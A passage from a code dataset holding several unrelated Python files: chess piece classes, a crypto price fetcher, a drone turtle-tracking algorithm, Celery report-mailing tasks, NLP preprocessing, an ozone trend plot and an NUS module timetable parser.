#even numbers are white, odd are black\n color = 'B'\n if number % 2 == 0:\n color = 'W'\n number = int(number / 2)\n for figure_type in cls.get_figure_types():\n if figure_type.figure_id == number:\n return figure_type(start_position, color)\n\n @classmethod\n def from_abreviation(cls, abreviation, start_position):\n color = 'B'\n if abreviation.upper() == abreviation:\n color = 'W'\n abreviation = abreviation.upper()\n for figure_type in cls.get_figure_types():\n if figure_type.abreviation == abreviation:\n return figure_type(start_position, color)\n\n def get_abreviation(self):\n if self.is_black():\n return self.abreviation.lower()\n return self.abreviation\n\n def set_board(self, board):\n self.board = board\n\n def all_moves(self):\n raise NotImplementedError()\n\n def controlled_tiles(self):\n raise NotImplementedError()\n\n def get_position(self):\n return self.position\n\n def set_position(self, new_position):\n self.position = new_position\n\n def get_color(self):\n return self.color\n\n def is_black(self):\n return not self.color\n\n def is_white(self):\n return self.color\n\n def x_position(self):\n return self.position.x\n\n def y_position(self):\n return self.position.y\n\n def as_ascii(self):\n if self.is_black():\n return self.black_ascii\n return self.white_ascii\n\n def is_free(self):\n return False\n\n def as_number(self):\n if self.is_white():\n return self.figure_id * 2\n return self.figure_id * 2 + 1\n\nclass NoFigure(Figure):\n def __init__(self, start_position=None, color=None, board=None):\n self.position = None\n return\n\n def all_moves(self):\n return []\n\n def is_white(self):\n return False\n\n def is_black(self):\n return False\n\n def is_free(self):\n return True\n\n def as_number(self):\n return 0\n\n\nclass Pawn(Figure):\n figure_id = 1\n abreviation = 'P'\n\n black_ascii = [r'..._...',\n r'..(#)..',\n r'../#\\..',\n r'.(###).']\n white_ascii = [r'..._...',\n r'..( )..',\n r'../ \\..',\n r'.(___).']\n\n def all_moves(self):\n direction = self.board.get_direction(self)\n moves = []\n if self.can_move_one(direction):\n moves.append(self.position + (0, direction))\n if self.can_move_two(direction):\n moves.append(self.position + (0, 2 * direction))\n if self.can_kill_left(direction):\n moves.append(self.position + (-1, direction))\n if self.can_kill_right(direction):\n moves.append(self.position + (1, direction))\n return moves\n\n def controlled_tiles(self):\n direction = self.board.get_direction(self)\n return [self.position + (1, direction),\n self.position + (-1, direction)]\n\n def can_move_one(self, direction):\n return self.board.tile_is_free(self.position + (0, direction))\n\n def can_move_two(self, direction):\n if not self.position.is_pawn_start(direction):\n return False\n if self.can_move_one(direction):\n return self.board.tile_is_free(self.position + (0, 2 * direction))\n\n def can_kill_left(self, direction):\n return self.board.is_enemy(self.position + (-1, direction), self)\n\n def can_kill_right(self, direction):\n return self.board.is_enemy(self.position + (1, direction), self)\n\n\nclass Knight(Figure):\n figure_id = 2\n abreviation = 'N'\n\n black_ascii = [r'..,-/|.',\n r'./_ )\\.',\n r'../#/\\.',\n r'.(###).']\n white_ascii = [r'..,-/|.',\n r'./_ )\\.',\n r'../ /\\.',\n r'.(___).']\n\n check_list = [(1, 2), (1, -2),\n (-1, 2), (-1, -2),\n (2, 1), (2, -1),\n (-2, 1), (-2, -1)]\n\n def controlled_tiles(self):\n return check_list\n\n def all_moves(self):\n moves = []\n for point in self.check_list:\n target = self.position + point\n if (self.board.tile_is_free(target) or\n self.board.is_enemy(target, self)):\n moves.append(target)\n return moves\n\n\nclass Rook(Figure):\n figure_id = 3\n abreviation = 'R'\n\n black_ascii = [r'.[_|_].',\n r'..[#]..',\n r'..[#]..',\n r'.(###).']\n white_ascii = [r'.[_|_].',\n r'..[ ]..',\n r'..[ ]..',\n r'.(___).']\n\n paths = [[(0, i) for i in range(1, 8)],\n [(0, -i) for i in range(1, 8)],\n [(i, 0) for i in range(1, 8)],\n [(-i, 0) for i in range(1, 8)]]\n\n def controlled_tiles(self, path):\n controlled = []\n for point in path:\n target = self.position + point\n if not self.board.tile_is_free(target):\n controlled.append(target)\n break\n controlled.append(target)\n return controlled\n\n def check_path(self, path):\n reachable = []\n for point in path:\n target = self.position + point\n if self.board.is_enemy(target, self):\n reachable.append(target)\n break\n if not self.board.tile_is_free(target):\n break\n reachable.append(target)\n return reachable\n\n def all_moves(self):\n moves = []\n for p in self.paths:\n moves.extend(self.check_path(p))\n return moves\n\nclass Bishop(Rook):\n figure_id = 4\n abreviation = 'B'\n\n black_ascii = [r'../|\\..',\n r'..\\|/..',\n r'..|#|..',\n r'.(###).']\n white_ascii = [r'../|\\..',\n r'..\\|/..',\n r'..| |..',\n r'.(___).']\n\n paths = [[(i, i) for i in range(1, 8)],\n [(i, -i) for i in range(1, 8)],\n [(-i, i) for i in range(1, 8)],\n [(-i, -i) for i in range(1, 8)]]\n\n\nclass Queen(Rook):\n figure_id = 5\n abreviation = 'Q'\n\n black_ascii = [r'..\\*/..',\n r'..(#)..',\n r'..)#(..',\n r'.(###).']\n white_ascii = [r'..\\*/..',\n r'..( )..',\n r'..) (..',\n r'.(___).']\n\n paths = [[(i, i) for i in range(1, 8)],\n [(i, -i) for i in range(1, 8)],\n [(-i, i) for i in range(1, 8)],\n [(-i, -i) for i in range(1, 8)],\n [(0, i) for i in range(1, 8)],\n [(0, -i) for i in range(1, 8)],\n [(i, 0) for i in range(1, 8)],\n [(-i, 0) for i in range(1, 8)]]\n\n\nclass King(Knight):\n figure_id = 6\n abreviation = 'K'\n\n black_ascii = [r'..\\+/..',\n r'..[#]..',\n r'..[#]..',\n r'.(###).']\n white_ascii = [r'..\\+/..',\n r'..[ ]..',\n r'..[ ]..',\n r'.(___).']\n\n check_list = [(-1, -1), (-1, 0), (-1, 1),\n (0, -1), (0, 1),\n (1, -1), (1, 0), (1, 1)]\n","sub_path":"figure.py","file_name":"figure.py","file_ext":"py","file_size_in_byte":8133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"559986214","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 19 16:51:21 2018\n\n@author: xx\n\"\"\"\n\nimport pandas as pd\nimport ccxt\n\nALTS = [\"BCH\",\n\"BTG\",\n\"ETH\",\n\"XRP\",\n\"LTC\",\n\"ETC\",\n\"TRX\",\n\"OMG\",\n\"SNT\",\n\"ZRX\",\n\"KNC\",\n\"BAT\",\n\"FUN\",\n\"EOS\",\n]\nALTS2 = [\"SALT\"]\n#SYMBOLS = [x+\"/BTC\" for x in ALTS]\n\nexchange = ccxt.bitfinex2()\n#markets = exchange.load_markets()\ndf = pd.DataFrame(columns=['BTC PRICE', 'TIME'])\nfor alt in ALTS:\n symbol = alt + \"/BTC\"\n ticker_data = exchange.fetch_ticker(symbol)\n df.loc[alt] = [ticker_data['last'], ticker_data['datetime']]\n \nexchange2 = ccxt.binance()\nfor alt in ALTS2:\n symbol = alt + \"/BTC\"\n ticker_data = exchange2.fetch_ticker(symbol)\n df.loc[alt] = [ticker_data['last'], ticker_data['datetime']]\n\ndf.to_excel(\"Alts_BTC_price\"+str(ticker_data['timestamp'])+\".xlsx\")\n","sub_path":"Alts_BTC_price.py","file_name":"Alts_BTC_price.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"6088867","text":"import threading\nimport time\nfrom datetime import datetime\nimport cv2\nimport numpy as np\nfrom math import pi\n\nfrom sensors.cameraFilter import CameraFilter\nfrom parallelIce.navDataClient import NavDataClient\nfrom parallelIce.cmdvel import CMDVel\nfrom parallelIce.extra import Extra\nfrom parallelIce.pose3dClient import Pose3DClient\n\n\ntime_cycle = 80\ndetect = False\n\nclass MyAlgorithm(threading.Thread):\n class pid(object):\n def __init__(self, kp, kd, ki):\n # Constant of PID control\n self.kp = kp\n self.kd = kd\n self.ki = ki\n self.error = 0\n self.acumulate_error = 0\n\n def calculateU(self, e):\n proportional = self.kp * e\n derivate = self.kd * (e - self.error)\n self.acumulate_error = self.acumulate_error + e\n integral = self.ki * (self.acumulate_error)\n u = -(proportional) - (derivate) - (integral)\n self.error = e\n return u\n\n def __init__(self, camera, navdata, pose, cmdvel, extra):\n self.camera = camera\n self.navdata = navdata\n self.pose = pose\n self.cmdvel = cmdvel\n self.extra = extra\n self.minError=0.01\n\n # Constructor PID\n self.pidX = self.pid(2.655, 0.000112, 0.00029)\n self.pidY = self.pid(2.655, 0.000112, 0.00029)\n\n self.stop_event = threading.Event()\n self.kill_event = threading.Event()\n self.lock = threading.Lock()\n threading.Thread.__init__(self, args=self.stop_event)\n\n\n def run (self):\n\n self.stop_event.clear()\n\n while (not self.kill_event.is_set()):\n\n start_time = datetime.now()\n\n if not self.stop_event.is_set():\n self.execute()\n\n finish_Time = datetime.now()\n\n dt = finish_Time - start_time\n ms = (dt.days * 24 * 60 * 60 + dt.seconds) * 1000 + dt.microseconds / 1000.0\n #print (ms)\n if (ms < time_cycle):\n time.sleep((time_cycle - ms) / 1000.0)\n\n def stop (self):\n self.stop_event.set()\n\n def play (self):\n if self.is_alive():\n self.stop_event.clear()\n else:\n self.start()\n\n def kill (self):\n self.kill_event.set()\n\n def execute(self):\n # Add your code here\n global detec\n\n input_image = self.camera.getImage()\n\n if input_image is not None:\n blur = cv2.GaussianBlur(input_image, (3, 3), 0)\n color_HSV = cv2.cvtColor(blur, cv2.COLOR_RGB2HSV)\n\n H_max = 4.3*(180/(2*pi))\n H_min = 1.98*(180/(2*pi))\n S_max = 0.8*(255/1)\n S_min = 0.3*(255/1)\n V_max = 255.5\n V_min = 51.81\n\n bk_image = cv2.inRange(color_HSV, np.array([H_min,S_min,V_min]), np.array([H_max,S_max,V_max]))\n\n kernel = np.ones((19, 19), np.uint8)\n image_HSV_close = cv2.morphologyEx(bk_image, cv2.MORPH_CLOSE, kernel)\n self.camera.setThresoldImage(image_HSV_close)\n\n image_HSV_cp = np.copy(image_HSV_close)\n input_image_cp = np.copy(input_image)\n image, contours, hierarchy = cv2.findContours(image_HSV_close, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)\n\n if contours is not None:\n cnt = contours[0]\n approx = cv2.approxPolyDP(cnt,0.1*cv2.arcLength(cnt,True),True)\n cnt_approx = cv2.approxPolyDP(cnt, 3, True);\n x,y,w,h = cv2.boundingRect(cnt_approx)\n image_contour = cv2.rectangle(input_image_cp,(x,y),(x+w,y+h),(0,255,0),2)\n self.camera.setColorImage(input_image_cp)\n detec = True\n else:\n self.camera.setColorImage(blur)\n\n if (detec == True):\n print (\"Turtle Detected\")\n # posicion central de la imagen en el filtro de color\n ini_pos = np.array([160, -90])\n coord_tur = np.array([x+w/2, -y+h/2])\n print (coord_tur)\n vect_1 = ini_pos - coord_tur\n vel_x = vect_1[0]*0.01\n vel_y = vect_1[1]*(-0.01)\n print (vel_x, vel_y)\n\n # ajuste de velocidades para que no se escape la tortuga\n # if vel_x > 0.6:\n # vel_x = 1.8\n # elif vel_x < -0.6:\n # vel_x = -1.8\n #\n # if vel_y > 0.6:\n # vel_y = 1.8\n # elif vel_y < -0.6:\n # vel_y = -1.8\n\n # envio de comandos de velocidades\n if abs(vel_x) < self.minError and abs(vel_y) < self.minError:\n self.cmdvel.sendCMDVel(0,0,0,0,0,0)\n print (\"Turtle Stop\")\n elif abs(vel_y) < self.minError and abs(vel_x) > self.minError:\n self.cmdvel.sendCMDVel(0,vel_x,0,0,0,0)\n print (\"Following X\")\n elif abs(vel_x) < self.minError and abs(vel_y) > self.minError:\n self.cmdvel.sendCMDVel(vel_y,0,0,0,0,0)\n print (\"Following Y\")\n else:\n self.cmdvel.sendCMDVel(vel_y,vel_x,0,0,0,0)\n print (\"Following turtle\")\n\n\n# if self.turtlebot_visual_field(contours):\n# # Calculating the error\n# errorx = (center[0] - img_center[0]) / 320\n# errory = (center[1] - img_center[1]) / 320\n#\n# # Controlador PID\n# controladorX = self.pidX.calculateU(errorx)\n# controladorY = self.pidY.calculateU(errory)\n# # print (\"error\", errorx, errory)\n# # print (\"controlador\", controladorX, controladorY)\n#\n# # Correct position\n# if (abs(errorx) <= self.minError) and (abs(errory) >= self.minError):\n# self.cmdvel.sendCMDVel(1.5 * controladorY, 0, 0, 0, 0, 0)\n# print (\"Following turtle on Y\")\n# if (abs(errorx) >= self.minError) and (abs(errory) <= self.minError):\n# self.cmdvel.sendCMDVel(0, 1.5 * controladorX, 0, 0, 0, 0)\n# print (\"Following turtle on X\")\n# if (abs(errorx) >= self.minError) and (abs(errory) >= self.minError):\n# self.cmdvel.sendCMDVel(1.5 * controladorY, 1.5 * controladorX, 0, 0, 0, 0)\n# print (\"Following turtle on X and Y\")\n# elif (abs(errorx) <= self.minError) and (abs(errory) <= self.minError):\n# # If the margin is minimum, then we have got the target\n# # The acumulate error is zero\n# self.pidX.acumulate_error = 0\n# self.pidY.acumulate_error = 0\n# self.cmdvel.sendCMDVel(0, 0, 0, 0, 0, 0)\n# print (\"Turtle Stop\")\n#\n# else:\n# # Climb up to see the turtlebot\n# self.cmdvel.sendCMDVel(0, 0, 0.2, 0, 0, 0)\n# pass\n# print (\"Turtle not on image\")\n","sub_path":"jderobot exercises/tortuga/MyAlgorithm.py","file_name":"MyAlgorithm.py","file_ext":"py","file_size_in_byte":7051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"173793474","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\nfrom collections import defaultdict, Counter\nfrom typing import List\n\n\nclass Solution:\n def totalFruit(self, tree: List[int]) -> int:\n def atMost(k, nums):\n i = ans = 0\n win = defaultdict(lambda: 0)\n for j in range(len(nums)):\n if win[nums[j]] == 0:\n k -= 1\n win[nums[j]] += 1\n while k < 0:\n win[nums[i]] -= 1\n if win[nums[i]] == 0:\n k += 1\n i += 1\n ans = max(ans, j - i + 1)\n return ans\n\n return atMost(2, tree)\n\n def totalFruit2(self, tree: List[int]) -> int:\n n = len(tree)\n seen = Counter()\n l = 0\n r = 0\n res = 0\n while r < n:\n if len(seen) == 2 and tree[r] not in seen:\n res = max(res, r - l)\n for t in seen:\n if t != tree[r - 1]:\n break\n l = seen[t] + 1\n seen.pop(t)\n seen[tree[r]] = r\n r += 1\n return max(res, r - l)\n\n\nif __name__ == '__main__':\n s = Solution()\n tree = [1, 2, 3, 2, 2] # 4\n print(s.totalFruit(tree))\n print(s.totalFruit2(tree))\n","sub_path":"双指针/904.py","file_name":"904.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"595287281","text":"from .celery_utils import celery_app\nfrom .sendemail import SendMail\n\nfrom app.reports_sql import (\n OrionReportAccessPoint, UnpackData, OrionReportWalkwaysPerson,\n OrionReportViolations, OrionReportFirtsLast\n)\n\nfrom datetime import datetime, timedelta\nfrom calendar import monthrange\nfrom dateutil.relativedelta import relativedelta\n\nfrom app.xlsx_ import SaveReport\n\nfrom app.db import get_db_no_g\n\nimport os\n\n# Helper datetime function\ndef dt_tw(wday):\n # Monday\n today = datetime.today()\n mon = today - timedelta(days = datetime.isoweekday(today)-1)\n if wday == 'm':\n return mon\n # Sunday\n if wday == 's':\n sun = mon + timedelta(days = 6)\n return sun\n # Today\n if wday == 't':\n return today\n\n\n# This task called by create_mail_task to create periodicaly task by schedule.\n@celery_app.task\ndef send_mail_task(id, report_id, recipient, periodicity, time, filename,\n weekday=None, date=None):\n\n db = get_db_no_g()\n\n row = db.execute(\"SELECT id, report_type, name, period,\\\n data FROM saved_reports WHERE id = ?\",\n (report_id,)).fetchone()\n if row:\n\n # Calculate time intervals\n if row['period'] == 'Previous week':\n date_start = (dt_tw('m') - timedelta(days = 7)).replace(hour=0, minute=0, second=0)\n date_end = (date_start + timedelta(days = 6)).replace(hour=23, minute=59, second=59)\n\n elif row['period'] == 'Previous day':\n date_start = dt_tw('t').replace(hour=0, minute=0, second=0) - timedelta(days=1)\n date_end = date_start.replace(hour=23, minute=59, second=59)\n\n elif row['period'] == 'Previous month':\n date_start = dt_tw('t').replace(day=1, hour=0, minute=0, second=0) - relativedelta(months = 1)\n # Last day of current month\n last_day = monthrange(date_start.year, date_start.month)[1]\n date_end = date_start.replace(day=last_day, hour=23, minute=59, second=59)\n\n # For person\n if row['report_type'] == 'Person':\n persons_id = row['data']\n data = UnpackData(OrionReportWalkwaysPerson(date_start, date_end, persons_id))\n\n # For access point\n elif row['report_type'] == 'Access point':\n ap = eval(row['data'])['ap']\n events = eval(row['data'])['events']\n data = UnpackData(OrionReportAccessPoint(date_start, date_end, ap, events))\n\n # For violations\n elif row['report_type'] == 'Violations':\n ap = row['data']\n data = UnpackData(OrionReportViolations(date_start, date_end, ap))\n\n # For first-last\n elif row['report_type'] == 'First-Last':\n persons_id = row['data'].split(',') # \n data = OrionReportFirtsLast(date_start, date_end, persons_id)\n\n xlsxfile = SaveReport(date_start, date_end, data, row['name'])\n subj = f\"Automatic report system. Report: \\\"{row['name']}\\\", generated at {datetime.now().isoformat()}\"\n\n mail_obj = SendMail(filename, xlsxfile, 'orion@localhost', recipient, subj)\n mail_obj.start()\n return\n\n# This task starts by schedule of celery beat, configured in celery_utils.py.\n# Default time startup - daily, at 00:00. This task selects mail task from\n# mail_task table and load today tasks to celery queue calling send_mail_task.apply_async()\n# method.\n@celery_app.task\ndef create_mail_task():\n from calendar import day_name\n\n celery_id = None\n\n db = get_db_no_g()\n cursor = db.execute(\"SELECT id, user_id, report_id, recipient,\\\n periodicity, time, weekday, date FROM mail_task;\"\n )\n row = cursor.fetchone()\n week_days = list(day_name)\n while row:\n now = datetime.now()\n countdown = now - now\n\n # To datetime format\n t = datetime.strptime(row['time'], '%H:%M:%S').time()\n\n if row['periodicity'] == 'daily':\n days = timedelta(days=0)\n elif row['periodicity'] == 'weekly':\n # Count days\n days = (week_days.index(row['weekday']) - datetime.weekday(now) + 7) % 7\n days = timedelta(days=days)\n elif row['periodicity'] == 'monthly':\n if row['date'] == now.day:\n days = timedelta(days=0)\n else:\n days = timedelta(days=-1)\n\n # Count timedelta\n countdown = ((now + days).replace(hour=t.hour, minute=t.minute, second=t.second)\n - now)\n\n\n # Do not create task if timedelta more than 86400 sec(24 hour)\n countdown = countdown.total_seconds()\n if countdown > 0 and countdown < 86400:\n\n username = 'Admin'\n if row['user_id'] != 10000000000:\n crsr = db.execute(\"SELECT username FROM user WHERE id=?\",\n (row['user_id'],)).fetchone()\n username = list(crsr).pop(0)\n filename = f\"{os.path.join('./instance', 'textmsg')}/{username}_{row['id']}.txt\"\n args = list(row)\n args.pop(1)\n args.insert(5, filename)\n celery_id = send_mail_task.apply_async(args, countdown=countdown).id\n\n # Write celery task id to DB\n if celery_id:\n db.execute(\"UPDATE mail_task\\\n SET celery_id = ? WHERE id = ?;\",\n (celery_id, row['id'])\n )\n db.commit()\n\n row = cursor.fetchone()\n return\n","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"620200646","text":"from src.configurations import ModelConfigurations \n\nclass PreprocessingTransformers:\n\n def __init__(self, filename: str):\n self.word2index = {}\n self.filename = filename \n self.vocab_size = 0\n\n self._load_file()\n\n def _load_file(self):\n import pickle \n f = open(self.filename, \"rb\")\n data = pickle.load(f)\n for d in data:\n for w, i in d.items():\n if w not in self.word2index:\n self.word2index[w] = int(i)\n self.vocab_size = len(self.word2index)\n \n f.close()\n\n def fit(self):\n pass \n \n def transform(self, text: str, max_length=128):\n import torch \n text = text.strip().split()\n text_ = []\n for r in text:\n r = r.replace(\"\\n\", \" \")\n r = r.replace(\"\\r\", \"\")\n r = r.replace(\".\", \" . \")\n r = r.replace(\",\", \" , \")\n text_.append(r)\n\n inputs = []\n for r in text_:\n if r in self.word2index:\n idx = self.word2index[r]\n else:\n idx = self.word2index[\"\"]\n inputs.append(idx)\n inputs.insert(0, self.word2index[\"\"])\n\n if max_length > len(inputs):\n for _ in range(max_length-len(inputs)):\n inputs.append(self.word2index[\"\"])\n else:\n inputs = inputs[:max_length]\n\n inputs = torch.tensor(inputs, dtype=torch.long)\n inputs = inputs.unsqueeze(0)\n\n return inputs \n\nprep = PreprocessingTransformers(\n ModelConfigurations().preprocessing_transformers_path\n)\n","sub_path":"prep_fast/src/ml/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"329529560","text":"import pandas as pd\n\n'''Part One: read in a file of changing frequencies and\nreport the resulting frequency.'''\n\nwith open('./data/day1input.txt', 'r') as f:\n changes = []\n for line in f:\n line = line.rstrip()\n changes.append(line)\ndata = pd.Series(changes)\nfreq = pd.to_numeric(data)\nprint(freq.sum())\n\n'''Part Two: Determine the first frequency your device reaches twice.'''\ndef freq_repeat(data):\n cumsum = 0\n count = 0\n freq_result = []\n while True:\n for i, val in enumerate(data):\n cumsum += val\n freq_result.append(cumsum)\n if freq_result.count(cumsum) == 2:\n return print(cumsum)\n break\n\n#test = pd.Series([1,-2, 3, 1])\nfreq_repeat(freq)\n","sub_path":"day_1.py","file_name":"day_1.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"73349707","text":"import re\n\nimport nltk\nimport pandas as pd\nfrom nltk.corpus import stopwords\nfrom nltk.stem.snowball import SnowballStemmer\n\nfrom src.utils.file_utils import read_documents, file_len\n\n# import mpld3\n\n# Resource related properties -------------------------------------------------\nRESOURCES_PATH = \"../resources/\"\nDATASET = RESOURCES_PATH + \"train_set.csv\"\nDOC_TITLE_IDX = 2\nDOC_CONTENT_IDX = 3\n\n\nclass Corpus:\n def __init__(self, dataset_file, has_header, stop_words):\n # Fields ----------------------------------------------------\n self.dataset_file = dataset_file\n self.has_header = has_header\n self.stop_words = stop_words\n self.stop_words.update([\"one\", \"two\", \"three\", \"first\", \"also\", \"since\"])\n self.top_categories_with_frequencies = {}\n self.stemmer = SnowballStemmer(\"english\")\n self.kmeans(DOC_TITLE_IDX, DOC_CONTENT_IDX)\n\n def kmeans(self, doc_title_idx, doc_cont_idx):\n # Used for displaying progress\n documents_count = file_len(self.dataset_file) - 1\n current_document = 0\n print(documents_count)\n\n totalvocab_stemmed = []\n totalvocab_tokenized = []\n for row in read_documents(self.dataset_file, self.has_header):\n content = row[doc_cont_idx]\n\n allwords_stemmed = self.tokenize_and_stem(content)\n totalvocab_stemmed.extend(allwords_stemmed)\n\n allwords_tokenized = self.tokenize_only(content)\n totalvocab_tokenized.extend(allwords_tokenized)\n\n vocab_frame = pd.DataFrame({\"words\": totalvocab_tokenized}, index=totalvocab_stemmed)\n print(\"there are \" + str(vocab_frame.shape[0]) + \" items in vocab_frame\")\n\n def tokenize_and_stem(self, text):\n # first tokenize by sentence, then by word to ensure that punctuation is caught as it\"s own token\n tokens = [word for sent in nltk.sent_tokenize(text) for word in nltk.word_tokenize(sent)]\n filtered_tokens = []\n # filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation)\n for token in tokens:\n if re.search(\"[a-zA-Z]\", token):\n filtered_tokens.append(token)\n stems = [self.stemmer.stem(t) for t in filtered_tokens]\n return stems\n\n def tokenize_only(self, text):\n # first tokenize by sentence, then by word to ensure that punctuation is caught as it\"s own token\n tokens = [word.lower() for sent in nltk.sent_tokenize(text) for word in nltk.word_tokenize(sent)]\n filtered_tokens = []\n # filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation)\n for token in tokens:\n if re.search(\"[a-zA-Z]\", token):\n filtered_tokens.append(token)\n return filtered_tokens\n\n\nif __name__ == \"__main__\":\n corpus = Corpus(DATASET, True, set(stopwords.words(\"english\")))\n print(\"Done\")\n","sub_path":"src/supervised_learning/old_samples/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"206875676","text":"import pylab as plt\nimport numpy as np\nfrom mpl_toolkits.basemap import Basemap, addcyclic, cm, shiftgrid\nimport matplotlib as mpl\nimport netCDF4 as nc\n##\nmpl.rc('figure', figsize=(14, 7), facecolor='white', dpi=120)\nmpl.rc('figure.subplot', wspace=0.5, hspace=0.3)\nmpl.rc('axes', grid=0, titlesize=5)\nmpl.rc('axes.formatter', limits=(-2, 5))\nmpl.rc('lines', linewidth=2, color='r')\nmpl.rc('font', size=11)\n\ndef subset_2d_array (dataset, lat, lat_range, lon, lon_range):\n \"\"\"\n take a 3D data field and do a zonal mean, i.e. across a latitude circle,\n over a given lat range\n i.e. zonal mean of 20S-20N data\n \"\"\"\n import numpy as np\n lat_min = lat_range[0]\n lat_max = lat_range[1]\n lat_max_idx = np.abs(lat - lat_max).argmin()\n lat_min_idx = np.abs(lat - lat_min).argmin()\n lon_min = lon_range[0]\n lon_min_idx = np.abs(lon - lon_min).argmin()\n lon_max = lon_range[1]\n lon_max_idx = np.abs(lon - lon_max).argmin()\n # subset the data into the months of interest and the lat region of interest\n datasubset = dataset[lat_min_idx:lat_max_idx, lon_min_idx:lon_max_idx]\n # take zonal mean\n # print lat_min_idx, lat_max_idx, lon_min_idx, lon_max_idx, np.shape(datasubset)\n return lat[lat_min_idx:lat_max_idx], lon[lon_min_idx:lon_max_idx], datasubset\n\n\ntrend = np.load('o3_emi_trend_1979_2009.npy')\ntrend = trend * 1e9 * 10 # ppbv per decade\nlats = np.load('regrid_lats.npy')\nlons = np.load('regrid_lons.npy')\n\n#setting up min and max lon regions for the USA\n\nus_lon_range = [-125, -60]\nus_lat_range = [15, 55]\n\nna_lon_range=[265,385]\nna_lat_range=[15,75]\n\nlat_range = na_lat_range\nlon_range = na_lon_range\n\nidx_min_lon = np.argmin(np.abs(lons - lon_range[0]))\nidx_max_lon = np.argmin(np.abs(lons - lon_range[1]))\nidx_min_lat = np.argmin(np.abs(lats - lat_range[0]))\nidx_max_lat = np.argmin(np.abs(lats - lat_range[1]))\nidx_lat_range = [idx_min_lat, idx_max_lat]\nidx_lon_range = [idx_min_lon, idx_max_lon]\n\nlat_sub, lon_sub, subset_trend = subset_2d_array(trend, lats, lat_range, lons, lon_range)\n\nplt.figure(figsize=(10,8), dpi=200)\nclevs=np.arange(-0.5, 0.6, 0.1)\nnewmap = Basemap(llcrnrlat=lat_range[0],urcrnrlat=lat_range[1],llcrnrlon=lon_range[0],urcrnrlon=lon_range[1],resolution='c') \n\nnewmap.drawparallels(np.arange(lat_range[0],lat_range[1], 10.), labels=[True,False,False,True])\n#labels = [left,right,top,bottom]\nnewmap.drawmeridians(np.arange(lon_range[0],lon_range[1], 10.), labels=[True,False,False,True])\nnewmap.drawcoastlines(linewidth=0.5)\n\nplt.pcolormesh(lon_sub, lat_sub, subset_trend, vmin=clevs[0], vmax = clevs[-1], cmap=plt.cm.RdBu_r)#, extend='both',cmap=plt.cm.RdBu_r)\n\nnewmap.colorbar(label = 'ozone trend / ppbv per decade') \nplt.title(' North Atlantic ozone trend / 1979-2010', fontsize=14)\n\nplt.savefig('o3_xlrua_trends_1979_2010.png')\n","sub_path":"data_analysis/plot_xlrua_o3_trend.py","file_name":"plot_xlrua_o3_trend.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"377136098","text":"import time\nimport calendar\nimport os\nimport requests\nimport json\n\n\ndef get_nus_modules_json():\n last_fetch = os.path.getmtime(\"modules.json\")\n curr_time = calendar.timegm(time.gmtime())\n\n if (curr_time - last_fetch > 432000): # 432000 sec == 5 days\n curr_month = time.gmtime().tm_mon\n curr_year = time.gmtime().tm_year - int(curr_month < 7)\n r = requests.get(\"https://api.nusmods.com/{}-{}/modules.json\".format(curr_year, curr_year+1))\n with open(\"modules.json\", \"w\") as file:\n json.dump(r.json(), file)\n return True\n return False\n\ndef nusmod_list(filename):\n '''\n #Dictionary of nus modules of format\n {:\n {\n {(class type, class code):\n Schedule for that class}\n :\n }\n\n {(class type 2, class code 2):\n Schedule for that class}\n :\n }\n }\n :\n }#End of all classes for the module\n }#End of module list\n '''\n translate = {\n 'Tutorial Type 2': \"TUT2\",\n 'Recitation': 'REC',\n 'Packaged Tutorial': 'PTUT',\n 'Packaged Lecture': 'PLEC',\n 'Seminar-Style Module Class': \"SEM\",\n 'Design Lecture': \"DLEC\",\n 'Laboratory': 'LAB',\n \"Lecture\": \"LEC\",\n \"Tutorial\": \"TUT\",\n 'Sectional Teaching': \"SEC\"}\n lst = [\"ModuleCode\", \"Timetable\"]\n all_modules = {}\n mods = read_json(filename)\n for i in mods:\n tmp = dict(filter(lambda x: x[0] in lst, tuple(i.items())))\n if \"Timetable\" in tmp.keys():\n a = tmp[\"Timetable\"]\n b = {}\n for i in a:\n if i[\"LessonType\"] in translate.keys():\n key = (translate[i[\"LessonType\"]], i[\"ClassNo\"])\n del i[\"LessonType\"]\n del i[\"ClassNo\"]\n del i[\"Venue\"] # delete venue from list\n weird = (\"Orientation Week\", \"Recess Week\", 'r', '')\n if i[\"WeekText\"] == \"Every Week\":\n i[\"WeekText\"] = [\n 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]\n elif i[\"WeekText\"] == \"Even Week\":\n i[\"WeekText\"] = [2, 4, 6, 8, 10, 12]\n elif i[\"WeekText\"] == \"Odd Week\":\n i[\"WeekText\"] = [1, 3, 5, 7, 9, 11, 13]\n elif i[\"WeekText\"] in weird:\n i[\"WeekText\"] = []\n else:\n try:\n i[\"WeekText\"] = list(\n map(lambda x: int(x), (i[\"WeekText\"]).split(\",\")))\n except BaseException:\n i[\"WeekText\"] = [\n 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]\n if key in b:\n b[key].append(dict(i.items()))\n else:\n b[key] = [i]\n else:\n print((tmp[\"ModuleCode\"], i[\"LessonType\"], i))\n\n 